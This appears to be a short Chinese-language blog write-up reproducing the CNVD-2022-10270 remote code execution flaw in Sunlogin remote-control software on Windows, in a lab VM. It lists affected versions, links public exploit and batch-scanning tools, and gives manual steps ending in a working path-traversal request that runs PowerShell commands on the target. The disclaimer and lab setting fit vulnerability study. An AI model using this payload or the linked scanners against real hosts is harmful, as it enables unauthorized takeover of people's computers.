CNVD-2022-10270/CNVD-2022-03672 向日葵RCE复现
0x00-引言
本文内容及使用工具仅限学习交流,用户滥用造成的一切后果均与作者无关,作者不承担任何直接责任, 后果均由用户本人负责,使用者请务必遵守当地法律法规。
复现的速度赶不上大佬出脚本的速度,牛掰
0x01-漏洞描述
上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。
影响版本:
向日葵个人版 for Windows <= 11.0.0.33
向日葵简约版 <= V1.0.1.43315(2021.12)
0x02-漏洞复现
工具下载(含有漏洞版本的向日葵):
https://github.com/Mr-xn/sunlogin_rce/releases/tag/new
工具命令:
-h 指定目标
-t 选择扫描或者命令执行 默认scan
-p 设置扫描端口范围 默认4w到65535
-c 需要执行的命令
01-工具复现
打开向日葵(我的装在虚拟机里面)
使用工具扫描-扫描时间长
命令执行
02-手动复现
nmap探测或者其他工具探测
浏览器访问ip+端口号+cgi-bin/rpc?action=verify-haras
(获取session值CID)一个一个端口尝试
拿到CID-添加payload和cookie-发送
http://192.168.234.139:49676/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami
03-批量检测工具
建议使用kali跑脚本,因为脚本要使用nmap
工具下载:
https://github.com/mrknow001/Sunlogin-rce